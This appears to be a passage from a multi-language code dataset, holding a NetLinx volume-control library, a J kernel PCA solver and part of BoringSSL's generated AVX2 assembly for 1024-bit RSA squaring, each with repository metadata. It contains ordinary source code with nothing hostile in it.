define_function vol_init(volume v, integer lvl, char muteState, integer min, integer max, integer numSteps)
{
volInit(v, lvl, muteState, min, max, numSteps);
}
/*
* Get pre-mute volume level.
* Returns current volume level.
*
* This function ignores mute status but respects min/max limits
* and dim state.
*/
define_function integer vol_get_level(volume v)
{
return volGetLevel(v);
}
/*
* Get post-mute volume level.
* Returns current volume level.
*
* This function takes into account mute status, min/max limits,
* and dim state.
*/
define_function integer vol_get_level_post_mute(volume v)
{
return volGetLevelPostMute(v);
}
/*
* Get pre-mute volume level.
* Returns current volume level.
*
* This function ignores mute status but respects min/max limits.
* Return value is scaled from an integer to a byte.
*/
define_function char vol_get_level_as_byte(volume v)
{
return volGetLevelAsByte(v);
}
/*
* Get post-mute volume level.
* Returns current volume level.
*
* This function takes into account mute status and min/max limits.
* Return value is scaled from an integer to a byte.
*/
define_function sinteger vol_get_level_post_mute_as_byte(volume v)
{
return volGetLevelPostMuteAsByte(v);
}
/*
* Get a volume level that fits on a touch panel's bargraph.
* Returns current volume level scaled to a range of 0-255
* taking into account min/max.
*/
define_function char vol_get_touch_panel_level(volume v)
{
return volGetTouchPanelLevel(v);
}
/*
* Set volume level.
* Returns status:
* (VOL_SUCCESS | VOL_LIMITED)
*
* This function takes into account min/max limits.
* This function does not affect mute status.
*/
define_function sinteger vol_set_level(volume v, integer value)
{
return volSetLevel(v, value);
}
/*
* Set volume level.
* Returns status:
* (VOL_SUCCESS | VOL_LIMITED)
*
* This function takes into account min/max limits.
* This function does not affect mute status.
* Input value is scaled from a byte to an integer.
*/
define_function sinteger vol_set_level_as_byte(volume v, char value)
{
return volSetLevelAsByte(v, value);
}
/*
* Set max limit.
* Input: value > 0 to enable, value = 0 to disable.
* Returns VOL_SUCCESS | VOL_LIMITED.
*/
define_function sinteger vol_set_max(volume v, integer value)
{
return volSetMax(v, value);
}
/*
* Set max limit.
* Input: value > 0 to enable, value = 0 to disable.
* Returns VOL_SUCCESS | VOL_LIMITED.
*
* Input value is scaled from a byte to an integer.
*/
define_function sinteger vol_set_max_as_byte(volume v, char value)
{
return volSetMaxAsByte(v, value);
}
/*
* Set minimum limit.
* Input: value > 0 to enable, value = 0 to disable.
* Returns VOL_SUCCESS | VOL_LIMITED.
*/
define_function sinteger vol_set_min(volume v, integer value)
{
return volSetMin(v, value);
}
/*
* Set minimum limit.
* Input: value > 0 to enable, value = 0 to disable.
* Returns VOL_SUCCESS | VOL_LIMITED.
*
* Input value is scaled from a byte to an integer.
*/
define_function sinteger vol_set_min_as_byte(volume v, char value)
{
return volSetMinAsByte(v, value);
}
/*
* Mute the channel.
*/
define_function vol_mute(volume v)
{
volMute(v);
}
/*
* Unmute the channel.
*/
define_function vol_unmute(volume v)
{
volUnmute(v);
}
/*
* Toggle the channel's mute state.
*
* Returns the resulting mute state after toggle:
* (VOL_MUTED | VOL_UNMUTED)
*/
define_function integer vol_toggle_mute(volume v)
{
return volToggleMute(v);
}
/*
* Get the control's mute state.
* Returns sinteger:
* (VOL_MUTED | VOL_UNMUTED)
*/
define_function integer vol_get_mute_state(volume v)
{
return volGetMuteState(v);
}
/*
* Set the amount that the level increases/decreases when incremented.
*/
define_function vol_set_step(volume v, integer value)
{
volSetStep(v, value);
}
/*
* Set the amount that the level increases/decreases when incremented.
*
* Input value is scaled from a byte to an integer.
*/
define_function vol_set_step_as_byte(volume v, char value)
{
volSetStepAsByte(v, value);
}
/*
* Set the number of steps the control can be incremented/decremented.
*
* This is an alternative to defining the value of the step.
*/
define_function sinteger vol_set_number_of_steps(volume v, integer steps)
{
return volSetNumberOfSteps(v, steps);
}
/*
* Increase the volume by incrementing the level by one step.
* Is not affected by mute state.
* Returns status:
* (VOL_SUCCESS | VOL_LIMITED | VOL_PARAM_NOT_SET)
*/
define_function sinteger vol_increment(volume v)
{
return volIncrement(v);
}
/*
* Decrease the volume by decrementing the level by one step.
* Is not affected by mute state.
* Returns status:
* (VOL_SUCCESS | VOL_LIMITED | VOL_PARAM_NOT_SET)
*/
define_function sinteger vol_decrement(volume v)
{
return volDecrement(v);
}
/*
* Dim the volume level.
*/
define_function vol_dim(volume v)
{
volDim(v);
}
/*
* Undim the volume level, returning it to its "normal" level.
*/
define_function vol_undim(volume v)
{
volUndim(v);
}
/*
* Get volume dim state.
* Returns status:
* (VOL_DIM_ON | VOL_DIM_OFF)
*/
define_function sinteger vol_get_dim_state(volume v)
{
return volGetDimState(v);
}
/*
* Get the amount that the level is dimmed when dim is on.
*/
define_function integer vol_get_dim_amount(volume v)
{
return volGetDimAmount(v);
}
/*
* Get the amount that the level is dimmed when dim is on.
*
* Returns a byte scaled from an integer.
*/
define_function char vol_get_dim_amount_as_byte(volume v)
{
return volGetDimAmountAsByte(v);
}
/*
* Set the amount that the level dims.
*/
define_function sinteger vol_set_dim_amount(volume v, integer amount)
{
return volSetDimAmount(v, amount);
}
/*
* Set the amount that the level dims.
*
* Input is scaled from a byte to an integer.
*/
define_function sinteger vol_set_dim_amount_as_byte(volume v, char amount)
{
return volSetDimAmountAsByte(v, amount);
}
/*
* Initialize an array of volume controls.
*
* Parameters min, max, and numSteps can be set to 0 if not needed.
*/
define_function vol_array_init(volume v[], integer lvl, char muteState, integer min, integer max, integer numSteps)
{
volArrayInit(v, lvl, muteState, min, max, numSteps);
}
/*
* Get the volume level for a control in an array at the given index.
* Returns current volume level.
*
* This function takes into account mute status and min/max limits.
*/
define_function integer vol_array_get_level(volume v[], integer index)
{
return volArrayGetLevel(v, index);
}
/*
* Get the volume level for a control in an array at the given index.
* Returns current volume level.
*
* This function takes into account mute status and min/max limits.
* Return value is scaled from an integer to a byte.
*/
define_function char vol_array_get_level_as_byte(volume v[], integer index)
{
return volArrayGetLevelAsByte(v, index);
}
/*
* Set the volume level for all controls in an array.
*/
define_function sinteger vol_array_set_level(volume v[], integer value)
{
return volArraySetLevel(v, value);
}
/*
* Set the volume level for all controls in an array.
*/
define_function sinteger vol_array_set_level_as_byte(volume v[], char value)
{
return volArraySetLevelAsByte(v, value);
}
/*
* Set the max volume limit for all controls in an array.
*
* Returns VOL_LIMITED if any instance in the array is limited.
* Otherwise returns VOL_SUCCESS.
*/
define_function sinteger vol_array_set_max(volume v[], integer value)
{
return volArraySetMax(v, value);
}
/*
* Set the max volume limit for all controls in an array.
*
* Returns VOL_LIMITED if any instance in the array is limited.
* Otherwise returns VOL_SUCCESS.
*/
define_function sinteger vol_array_set_max_as_byte(volume v[], char value)
{
return volArraySetMaxAsByte(v, value);
}
/*
* Set the min volume limit for all controls in an array.
*
* Returns VOL_LIMITED if any instance in the array is limited.
* Otherwise returns VOL_SUCCESS.
*/
define_function sinteger vol_array_set_min(volume v[], integer value)
{
return volArraySetMin(v, value);
}
/*
* Set the min volume limit for all controls in an array.
*
* Returns VOL_LIMITED if any instance in the array is limited.
* Otherwise returns VOL_SUCCESS.
*/
define_function sinteger vol_array_set_min_as_byte(volume v[], char value)
{
return volArraySetMinAsByte(v, value);
}
/*
* Set the volume step amount for all controls in an array.
*/
define_function vol_array_set_step(volume v[], integer value)
{
volArraySetStep(v, value);
}
/*
* Set the volume step amount for all controls in an array.
*/
define_function vol_array_set_step_as_byte(volume v[], char value)
{
volArraySetStepAsByte(v, value);
}
/*
* Set the number of steps all controls in the array can be
* incremented or decremented.
*/
define_function sinteger vol_array_set_number_of_steps(volume v[], integer steps)
{
return volArraySetNumberOfSteps(v, steps);
}
/*
* Mute all of the controls in the array.
*/
define_function vol_array_mute(volume v[])
{
volArrayMute(v);
}
/*
* Unmute all of the controls in the array.
*/
define_function vol_array_unmute(volume v[])
{
volArrayUnmute(v);
}
/*
* Increase the volume of all controls in the array
* by one step.
*/
define_function sinteger vol_array_increment(volume v[])
{
return volArrayIncrement(v);
}
/*
* Decrease the volume of all controls in the array
* by one step.
*/
define_function sinteger vol_array_decrement(volume v[])
{
return volArrayDecrement(v);
}
/*
* Dim the volume level of all controls in the array.
*/
define_function vol_array_dim(volume v[])
{
volArrayDim(v);
}
/*
* Undim the volume level of all controls in the array,
* returning them to their "normal" level.
*/
define_function vol_array_undim(volume v[])
{
volArrayUndim(v);
}
/*
* Set the amount that the level dims for an array.
*/
define_function vol_array_set_dim_amount(volume v[], integer amount)
{
volArraySetDimAmount(v, amount);
}
/*
* Set the amount that the level dims for an array.
*
* Input is scaled from a byte to an integer.
*/
define_function vol_array_set_dim_amount_as_byte(volume v[], char amount)
{
volArraySetDimAmountAsByte(v, amount);
}
(***********************************************************)
#end_if
| NetLinx | 5 | ajnavarro/language-dataset | data/github.com/amclain/amx-lib-redis/ad2dd82b8e9f42b02faa62b3a69df633e915f4d8/integration/include/amx-lib-volume/amx-lib-volume-sc.axi | [
"MIT"
] |
Note 0
Copyright (C) 2017 Jonathan Hough. All rights reserved.
)
NB. Kernel PCA algorithm
NB. Applies some kernel to datapoint pairs.
Note 'References'
[1] Pattern Recognition and Machine Learning, Cristopher M. Bishop
page 586-590
)
load 'math/lapack'
load 'math/lapack/geev'
load 'math/lapack/gesvd'
coclass 'KPCASolver'
kernelExpSquared=: 3 : 0
'd1 d2 c1 c2'=. y
s=. -:- c1 * (+/"1) (*: d1 -"1 1"1 _ d2)
c2 * ^ s
)
NB. Creates a KPCASolver instance.
NB. Arguments:
NB. 0: data points
NB. 1: kernel type. Can be:
NB. 'gaussian'
NB. ''
NB. 2: restriction, either 0 or 1. 0 implies
NB. restricting to eigenvectors whose corresponding
NB. eigenvalues are greater than the given limit.
NB. 1 implies rectricting to a given number of
NB. eigenvectors.
NB. 3: limit value. Depends on argument 1. If restriction
NB. value is 0, then limit should be a numeric value
NB. representing the minimum eigenvalue.
NB. If restriction value is 1, then limit should be an
NB. integer in the range (1,N), where N is the
NB. total number of dimensions (features) of the dataset.
NB. 4: kernel parameter 1.
NB. 5: kernel parameter 2.
create=: 3 : 0
'X kernel restriction limit c1 c2'=. y
assert. 2=#$X
assert. restriction e. 0 1
assert. (limit < >:1{$X) *. limit>0
K=: kernelExpSquared X;X;c1;c2
N=. #X
NB. TODO don't use huge square matrix, inefficient.
I=. 1 $~ ,/~ N
K3=: (*:N)%~ I (+/ .*) K (+/ .*) I
Kr=: (K+K3)
Kn=: Kr - N%~ I (+/ .*) K
Kd=: Kn - N%~ K (+/ .*) I
K=: Kd
e=. gesvd_jlapack_ K
evals=. >1{e
evecs=. >0{e
if. restriction = 0 do.
reduced=: evecs {"_ 1~ I. evals > limit
else.
reduced=: limit{."1 evecs
end.
smoutput limit
eigenVecs=: evecs
eigenVals=: evals
)
destroy=:codestroy
| J | 5 | jonghough/jlearn | dr/kpca.ijs | [
"MIT"
] |
; This file is generated from a similarly-named Perl script in the BoringSSL
; source tree. Do not edit by hand.
default rel
%define XMMWORD
%define YMMWORD
%define ZMMWORD
%ifdef BORINGSSL_PREFIX
%include "boringssl_prefix_symbols_nasm.inc"
%endif
section .text code align=64
global rsaz_1024_sqr_avx2
ALIGN 64
rsaz_1024_sqr_avx2:
mov QWORD[8+rsp],rdi ;WIN64 prologue
mov QWORD[16+rsp],rsi
mov rax,rsp
$L$SEH_begin_rsaz_1024_sqr_avx2:
mov rdi,rcx
mov rsi,rdx
mov rdx,r8
mov rcx,r9
mov r8,QWORD[40+rsp]
lea rax,[rsp]
push rbx
push rbp
push r12
push r13
push r14
push r15
vzeroupper
lea rsp,[((-168))+rsp]
vmovaps XMMWORD[(-216)+rax],xmm6
vmovaps XMMWORD[(-200)+rax],xmm7
vmovaps XMMWORD[(-184)+rax],xmm8
vmovaps XMMWORD[(-168)+rax],xmm9
vmovaps XMMWORD[(-152)+rax],xmm10
vmovaps XMMWORD[(-136)+rax],xmm11
vmovaps XMMWORD[(-120)+rax],xmm12
vmovaps XMMWORD[(-104)+rax],xmm13
vmovaps XMMWORD[(-88)+rax],xmm14
vmovaps XMMWORD[(-72)+rax],xmm15
$L$sqr_1024_body:
mov rbp,rax
mov r13,rdx
sub rsp,832
mov r15,r13
sub rdi,-128
sub rsi,-128
sub r13,-128
and r15,4095
add r15,32*10
shr r15,12
vpxor ymm9,ymm9,ymm9
jz NEAR $L$sqr_1024_no_n_copy
sub rsp,32*10
vmovdqu ymm0,YMMWORD[((0-128))+r13]
and rsp,-2048
vmovdqu ymm1,YMMWORD[((32-128))+r13]
vmovdqu ymm2,YMMWORD[((64-128))+r13]
vmovdqu ymm3,YMMWORD[((96-128))+r13]
vmovdqu ymm4,YMMWORD[((128-128))+r13]
vmovdqu ymm5,YMMWORD[((160-128))+r13]
vmovdqu ymm6,YMMWORD[((192-128))+r13]
vmovdqu ymm7,YMMWORD[((224-128))+r13]
vmovdqu ymm8,YMMWORD[((256-128))+r13]
lea r13,[((832+128))+rsp]
vmovdqu YMMWORD[(0-128)+r13],ymm0
vmovdqu YMMWORD[(32-128)+r13],ymm1
vmovdqu YMMWORD[(64-128)+r13],ymm2
vmovdqu YMMWORD[(96-128)+r13],ymm3
vmovdqu YMMWORD[(128-128)+r13],ymm4
vmovdqu YMMWORD[(160-128)+r13],ymm5
vmovdqu YMMWORD[(192-128)+r13],ymm6
vmovdqu YMMWORD[(224-128)+r13],ymm7
vmovdqu YMMWORD[(256-128)+r13],ymm8
vmovdqu YMMWORD[(288-128)+r13],ymm9
$L$sqr_1024_no_n_copy:
and rsp,-1024
vmovdqu ymm1,YMMWORD[((32-128))+rsi]
vmovdqu ymm2,YMMWORD[((64-128))+rsi]
vmovdqu ymm3,YMMWORD[((96-128))+rsi]
vmovdqu ymm4,YMMWORD[((128-128))+rsi]
vmovdqu ymm5,YMMWORD[((160-128))+rsi]
vmovdqu ymm6,YMMWORD[((192-128))+rsi]
vmovdqu ymm7,YMMWORD[((224-128))+rsi]
vmovdqu ymm8,YMMWORD[((256-128))+rsi]
lea rbx,[192+rsp]
vmovdqu ymm15,YMMWORD[$L$and_mask]
jmp NEAR $L$OOP_GRANDE_SQR_1024
ALIGN 32
$L$OOP_GRANDE_SQR_1024:
lea r9,[((576+128))+rsp]
lea r12,[448+rsp]
vpaddq ymm1,ymm1,ymm1
vpbroadcastq ymm10,QWORD[((0-128))+rsi]
vpaddq ymm2,ymm2,ymm2
vmovdqa YMMWORD[(0-128)+r9],ymm1
vpaddq ymm3,ymm3,ymm3
vmovdqa YMMWORD[(32-128)+r9],ymm2
vpaddq ymm4,ymm4,ymm4
vmovdqa YMMWORD[(64-128)+r9],ymm3
vpaddq ymm5,ymm5,ymm5
vmovdqa YMMWORD[(96-128)+r9],ymm4
vpaddq ymm6,ymm6,ymm6
vmovdqa YMMWORD[(128-128)+r9],ymm5
vpaddq ymm7,ymm7,ymm7
vmovdqa YMMWORD[(160-128)+r9],ymm6
vpaddq ymm8,ymm8,ymm8
vmovdqa YMMWORD[(192-128)+r9],ymm7
vpxor ymm9,ymm9,ymm9
vmovdqa YMMWORD[(224-128)+r9],ymm8
vpmuludq ymm0,ymm10,YMMWORD[((0-128))+rsi]
vpbroadcastq ymm11,QWORD[((32-128))+rsi]
vmovdqu YMMWORD[(288-192)+rbx],ymm9
vpmuludq ymm1,ymm1,ymm10
vmovdqu YMMWORD[(320-448)+r12],ymm9
vpmuludq ymm2,ymm2,ymm10
vmovdqu YMMWORD[(352-448)+r12],ymm9
vpmuludq ymm3,ymm3,ymm10
vmovdqu YMMWORD[(384-448)+r12],ymm9
vpmuludq ymm4,ymm4,ymm10
vmovdqu YMMWORD[(416-448)+r12],ymm9
vpmuludq ymm5,ymm5,ymm10
vmovdqu YMMWORD[(448-448)+r12],ymm9
vpmuludq ymm6,ymm6,ymm10
vmovdqu YMMWORD[(480-448)+r12],ymm9
vpmuludq ymm7,ymm7,ymm10
vmovdqu YMMWORD[(512-448)+r12],ymm9
vpmuludq ymm8,ymm8,ymm10
vpbroadcastq ymm10,QWORD[((64-128))+rsi]
vmovdqu YMMWORD[(544-448)+r12],ymm9
mov r15,rsi
mov r14d,4
jmp NEAR $L$sqr_entry_1024
ALIGN 32
$L$OOP_SQR_1024:
vpbroadcastq ymm11,QWORD[((32-128))+r15]
vpmuludq ymm0,ymm10,YMMWORD[((0-128))+rsi]
vpaddq ymm0,ymm0,YMMWORD[((0-192))+rbx]
vpmuludq ymm1,ymm10,YMMWORD[((0-128))+r9]
vpaddq ymm1,ymm1,YMMWORD[((32-192))+rbx]
vpmuludq ymm2,ymm10,YMMWORD[((32-128))+r9]
vpaddq ymm2,ymm2,YMMWORD[((64-192))+rbx]
vpmuludq ymm3,ymm10,YMMWORD[((64-128))+r9]
vpaddq ymm3,ymm3,YMMWORD[((96-192))+rbx]
vpmuludq ymm4,ymm10,YMMWORD[((96-128))+r9]
vpaddq ymm4,ymm4,YMMWORD[((128-192))+rbx]
vpmuludq ymm5,ymm10,YMMWORD[((128-128))+r9]
vpaddq ymm5,ymm5,YMMWORD[((160-192))+rbx]
vpmuludq ymm6,ymm10,YMMWORD[((160-128))+r9]
vpaddq ymm6,ymm6,YMMWORD[((192-192))+rbx]
vpmuludq ymm7,ymm10,YMMWORD[((192-128))+r9]
vpaddq ymm7,ymm7,YMMWORD[((224-192))+rbx]
vpmuludq ymm8,ymm10,YMMWORD[((224-128))+r9]
vpbroadcastq ymm10,QWORD[((64-128))+r15]
vpaddq ymm8,ymm8,YMMWORD[((256-192))+rbx]
$L$sqr_entry_1024:
vmovdqu YMMWORD[(0-192)+rbx],ymm0
vmovdqu YMMWORD[(32-192)+rbx],ymm1
vpmuludq ymm12,ymm11,YMMWORD[((32-128))+rsi]
vpaddq ymm2,ymm2,ymm12
vpmuludq ymm14,ymm11,YMMWORD[((32-128))+r9]
vpaddq ymm3,ymm3,ymm14
vpmuludq ymm13,ymm11,YMMWORD[((64-128))+r9]
vpaddq ymm4,ymm4,ymm13
vpmuludq ymm12,ymm11,YMMWORD[((96-128))+r9]
vpaddq ymm5,ymm5,ymm12
vpmuludq ymm14,ymm11,YMMWORD[((128-128))+r9]
vpaddq ymm6,ymm6,ymm14
vpmuludq ymm13,ymm11,YMMWORD[((160-128))+r9]
vpaddq ymm7,ymm7,ymm13
vpmuludq ymm12,ymm11,YMMWORD[((192-128))+r9]
vpaddq ymm8,ymm8,ymm12
vpmuludq ymm0,ymm11,YMMWORD[((224-128))+r9]
vpbroadcastq ymm11,QWORD[((96-128))+r15]
vpaddq ymm0,ymm0,YMMWORD[((288-192))+rbx]
vmovdqu YMMWORD[(64-192)+rbx],ymm2
vmovdqu YMMWORD[(96-192)+rbx],ymm3
vpmuludq ymm13,ymm10,YMMWORD[((64-128))+rsi]
vpaddq ymm4,ymm4,ymm13
vpmuludq ymm12,ymm10,YMMWORD[((64-128))+r9]
vpaddq ymm5,ymm5,ymm12
vpmuludq ymm14,ymm10,YMMWORD[((96-128))+r9]
vpaddq ymm6,ymm6,ymm14
vpmuludq ymm13,ymm10,YMMWORD[((128-128))+r9]
vpaddq ymm7,ymm7,ymm13
vpmuludq ymm12,ymm10,YMMWORD[((160-128))+r9]
vpaddq ymm8,ymm8,ymm12
vpmuludq ymm14,ymm10,YMMWORD[((192-128))+r9]
vpaddq ymm0,ymm0,ymm14
vpmuludq ymm1,ymm10,YMMWORD[((224-128))+r9]
vpbroadcastq ymm10,QWORD[((128-128))+r15]
vpaddq ymm1,ymm1,YMMWORD[((320-448))+r12]
vmovdqu YMMWORD[(128-192)+rbx],ymm4
vmovdqu YMMWORD[(160-192)+rbx],ymm5
vpmuludq ymm12,ymm11,YMMWORD[((96-128))+rsi]
vpaddq ymm6,ymm6,ymm12
vpmuludq ymm14,ymm11,YMMWORD[((96-128))+r9]
vpaddq ymm7,ymm7,ymm14
vpmuludq ymm13,ymm11,YMMWORD[((128-128))+r9]
vpaddq ymm8,ymm8,ymm13
vpmuludq ymm12,ymm11,YMMWORD[((160-128))+r9]
vpaddq ymm0,ymm0,ymm12
vpmuludq ymm14,ymm11,YMMWORD[((192-128))+r9]
vpaddq ymm1,ymm1,ymm14
vpmuludq ymm2,ymm11,YMMWORD[((224-128))+r9]
vpbroadcastq ymm11,QWORD[((160-128))+r15]
vpaddq ymm2,ymm2,YMMWORD[((352-448))+r12]
vmovdqu YMMWORD[(192-192)+rbx],ymm6
vmovdqu YMMWORD[(224-192)+rbx],ymm7
vpmuludq ymm12,ymm10,YMMWORD[((128-128))+rsi]
vpaddq ymm8,ymm8,ymm12
vpmuludq ymm14,ymm10,YMMWORD[((128-128))+r9]
vpaddq ymm0,ymm0,ymm14
vpmuludq ymm13,ymm10,YMMWORD[((160-128))+r9]
vpaddq ymm1,ymm1,ymm13
vpmuludq ymm12,ymm10,YMMWORD[((192-128))+r9]
vpaddq ymm2,ymm2,ymm12
vpmuludq ymm3,ymm10,YMMWORD[((224-128))+r9]
vpbroadcastq ymm10,QWORD[((192-128))+r15]
vpaddq ymm3,ymm3,YMMWORD[((384-448))+r12]
vmovdqu YMMWORD[(256-192)+rbx],ymm8
vmovdqu YMMWORD[(288-192)+rbx],ymm0
lea rbx,[8+rbx]
vpmuludq ymm13,ymm11,YMMWORD[((160-128))+rsi]
vpaddq ymm1,ymm1,ymm13
vpmuludq ymm12,ymm11,YMMWORD[((160-128))+r9]
vpaddq ymm2,ymm2,ymm12
vpmuludq ymm14,ymm11,YMMWORD[((192-128))+r9]
vpaddq ymm3,ymm3,ymm14
vpmuludq ymm4,ymm11,YMMWORD[((224-128))+r9]
vpbroadcastq ymm11,QWORD[((224-128))+r15]
vpaddq ymm4,ymm4,YMMWORD[((416-448))+r12]
vmovdqu YMMWORD[(320-448)+r12],ymm1
vmovdqu YMMWORD[(352-448)+r12],ymm2
vpmuludq ymm12,ymm10,YMMWORD[((192-128))+rsi]
vpaddq ymm3,ymm3,ymm12
vpmuludq ymm14,ymm10,YMMWORD[((192-128))+r9]
vpbroadcastq ymm0,QWORD[((256-128))+r15]
vpaddq ymm4,ymm4,ymm14
vpmuludq ymm5,ymm10,YMMWORD[((224-128))+r9]
vpbroadcastq ymm10,QWORD[((0+8-128))+r15]
vpaddq ymm5,ymm5,YMMWORD[((448-448))+r12]
vmovdqu YMMWORD[(384-448)+r12],ymm3
vmovdqu YMMWORD[(416-448)+r12],ymm4
lea r15,[8+r15]
vpmuludq ymm12,ymm11,YMMWORD[((224-128))+rsi]
vpaddq ymm5,ymm5,ymm12
vpmuludq ymm6,ymm11,YMMWORD[((224-128))+r9]
vpaddq ymm6,ymm6,YMMWORD[((480-448))+r12]
vpmuludq ymm7,ymm0,YMMWORD[((256-128))+rsi]
vmovdqu YMMWORD[(448-448)+r12],ymm5
vpaddq ymm7,ymm7,YMMWORD[((512-448))+r12]
vmovdqu YMMWORD[(480-448)+r12],ymm6
vmovdqu YMMWORD[(512-448)+r12],ymm7
lea r12,[8+r12]
dec r14d
jnz NEAR $L$OOP_SQR_1024
vmovdqu ymm8,YMMWORD[256+rsp]
vmovdqu ymm1,YMMWORD[288+rsp]
vmovdqu ymm2,YMMWORD[320+rsp]
lea rbx,[192+rsp]
vpsrlq ymm14,ymm8,29
vpand ymm8,ymm8,ymm15
vpsrlq ymm11,ymm1,29
vpand ymm1,ymm1,ymm15
vpermq ymm14,ymm14,0x93
vpxor ymm9,ymm9,ymm9
vpermq ymm11,ymm11,0x93
vpblendd ymm10,ymm14,ymm9,3
vpblendd ymm14,ymm11,ymm14,3
vpaddq ymm8,ymm8,ymm10
vpblendd ymm11,ymm9,ymm11,3
vpaddq ymm1,ymm1,ymm14
vpaddq ymm2,ymm2,ymm11
vmovdqu YMMWORD[(288-192)+rbx],ymm1
vmovdqu YMMWORD[(320-192)+rbx],ymm2
mov rax,QWORD[rsp]
mov r10,QWORD[8+rsp]
mov r11,QWORD[16+rsp]
mov r12,QWORD[24+rsp]
vmovdqu ymm1,YMMWORD[32+rsp]
vmovdqu ymm2,YMMWORD[((64-192))+rbx]
vmovdqu ymm3,YMMWORD[((96-192))+rbx]
vmovdqu ymm4,YMMWORD[((128-192))+rbx]
vmovdqu ymm5,YMMWORD[((160-192))+rbx]
vmovdqu ymm6,YMMWORD[((192-192))+rbx]
vmovdqu ymm7,YMMWORD[((224-192))+rbx]
mov r9,rax
imul eax,ecx
and eax,0x1fffffff
vmovd xmm12,eax
mov rdx,rax
imul rax,QWORD[((-128))+r13]
vpbroadcastq ymm12,xmm12
add r9,rax
mov rax,rdx
imul rax,QWORD[((8-128))+r13]
shr r9,29
add r10,rax
mov rax,rdx
imul rax,QWORD[((16-128))+r13]
add r10,r9
add r11,rax
imul rdx,QWORD[((24-128))+r13]
add r12,rdx
mov rax,r10
imul eax,ecx
and eax,0x1fffffff
mov r14d,9
jmp NEAR $L$OOP_REDUCE_1024
ALIGN 32
$L$OOP_REDUCE_1024:
vmovd xmm13,eax
vpbroadcastq ymm13,xmm13
vpmuludq ymm10,ymm12,YMMWORD[((32-128))+r13]
mov rdx,rax
imul rax,QWORD[((-128))+r13]
vpaddq ymm1,ymm1,ymm10
add r10,rax
vpmuludq ymm14,ymm12,YMMWORD[((64-128))+r13]
mov rax,rdx
imul rax,QWORD[((8-128))+r13]
vpaddq ymm2,ymm2,ymm14
vpmuludq ymm11,ymm12,YMMWORD[((96-128))+r13]
DB 0x67
add r11,rax
DB 0x67
mov rax,rdx
imul rax,QWORD[((16-128))+r13]
shr r10,29
vpaddq ymm3,ymm3,ymm11
vpmuludq ymm10,ymm12,YMMWORD[((128-128))+r13]
add r12,rax
add r11,r10
vpaddq ymm4,ymm4,ymm10
vpmuludq ymm14,ymm12,YMMWORD[((160-128))+r13]
mov rax,r11
imul eax,ecx
vpaddq ymm5,ymm5,ymm14
vpmuludq ymm11,ymm12,YMMWORD[((192-128))+r13]
and eax,0x1fffffff
vpaddq ymm6,ymm6,ymm11
vpmuludq ymm10,ymm12,YMMWORD[((224-128))+r13]
vpaddq ymm7,ymm7,ymm10
vpmuludq ymm14,ymm12,YMMWORD[((256-128))+r13]
vmovd xmm12,eax
vpaddq ymm8,ymm8,ymm14
vpbroadcastq ymm12,xmm12
vpmuludq ymm11,ymm13,YMMWORD[((32-8-128))+r13]
vmovdqu ymm14,YMMWORD[((96-8-128))+r13]
mov rdx,rax
imul rax,QWORD[((-128))+r13]
vpaddq ymm1,ymm1,ymm11
vpmuludq ymm10,ymm13,YMMWORD[((64-8-128))+r13]
vmovdqu ymm11,YMMWORD[((128-8-128))+r13]
add r11,rax
mov rax,rdx
imul rax,QWORD[((8-128))+r13]
vpaddq ymm2,ymm2,ymm10
add rax,r12
shr r11,29
vpmuludq ymm14,ymm14,ymm13
vmovdqu ymm10,YMMWORD[((160-8-128))+r13]
add rax,r11
vpaddq ymm3,ymm3,ymm14
vpmuludq ymm11,ymm11,ymm13
vmovdqu ymm14,YMMWORD[((192-8-128))+r13]
DB 0x67
mov r12,rax
imul eax,ecx
vpaddq ymm4,ymm4,ymm11
vpmuludq ymm10,ymm10,ymm13
DB 0xc4,0x41,0x7e,0x6f,0x9d,0x58,0x00,0x00,0x00
and eax,0x1fffffff
vpaddq ymm5,ymm5,ymm10
vpmuludq ymm14,ymm14,ymm13
vmovdqu ymm10,YMMWORD[((256-8-128))+r13]
vpaddq ymm6,ymm6,ymm14
vpmuludq ymm11,ymm11,ymm13
vmovdqu ymm9,YMMWORD[((288-8-128))+r13]
vmovd xmm0,eax
imul rax,QWORD[((-128))+r13]
vpaddq ymm7,ymm7,ymm11
vpmuludq ymm10,ymm10,ymm13
vmovdqu ymm14,YMMWORD[((32-16-128))+r13]
vpbroadcastq ymm0,xmm0
vpaddq ymm8,ymm8,ymm10
vpmuludq ymm9,ymm9,ymm13
vmovdqu ymm11,YMMWORD[((64-16-128))+r13]
add r12,rax
vmovdqu ymm13,YMMWORD[((32-24-128))+r13]
vpmuludq ymm14,ymm14,ymm12
vmovdqu ymm10,YMMWORD[((96-16-128))+r13]
vpaddq ymm1,ymm1,ymm14
vpmuludq ymm13,ymm13,ymm0
vpmuludq ymm11,ymm11,ymm12
DB 0xc4,0x41,0x7e,0x6f,0xb5,0xf0,0xff,0xff,0xff
vpaddq ymm13,ymm13,ymm1
vpaddq ymm2,ymm2,ymm11
vpmuludq ymm10,ymm10,ymm12
vmovdqu ymm11,YMMWORD[((160-16-128))+r13]
DB 0x67
vmovq rax,xmm13
vmovdqu YMMWORD[rsp],ymm13
vpaddq ymm3,ymm3,ymm10
vpmuludq ymm14,ymm14,ymm12
vmovdqu ymm10,YMMWORD[((192-16-128))+r13]
vpaddq ymm4,ymm4,ymm14
vpmuludq ymm11,ymm11,ymm12
vmovdqu ymm14,YMMWORD[((224-16-128))+r13]
vpaddq ymm5,ymm5,ymm11
vpmuludq ymm10,ymm10,ymm12
vmovdqu ymm11,YMMWORD[((256-16-128))+r13]
vpaddq ymm6,ymm6,ymm10
vpmuludq ymm14,ymm14,ymm12
shr r12,29
vmovdqu ymm10,YMMWORD[((288-16-128))+r13]
add rax,r12
vpaddq ymm7,ymm7,ymm14
vpmuludq ymm11,ymm11,ymm12
mov r9,rax
imul eax,ecx
vpaddq ymm8,ymm8,ymm11
vpmuludq ymm10,ymm10,ymm12
and eax,0x1fffffff
vmovd xmm12,eax
vmovdqu ymm11,YMMWORD[((96-24-128))+r13]
DB 0x67
vpaddq ymm9,ymm9,ymm10
vpbroadcastq ymm12,xmm12
vpmuludq ymm14,ymm0,YMMWORD[((64-24-128))+r13]
vmovdqu ymm10,YMMWORD[((128-24-128))+r13]
mov rdx,rax
imul rax,QWORD[((-128))+r13]
mov r10,QWORD[8+rsp]
vpaddq ymm1,ymm2,ymm14
vpmuludq ymm11,ymm11,ymm0
vmovdqu ymm14,YMMWORD[((160-24-128))+r13]
add r9,rax
mov rax,rdx
imul rax,QWORD[((8-128))+r13]
DB 0x67
shr r9,29
mov r11,QWORD[16+rsp]
vpaddq ymm2,ymm3,ymm11
vpmuludq ymm10,ymm10,ymm0
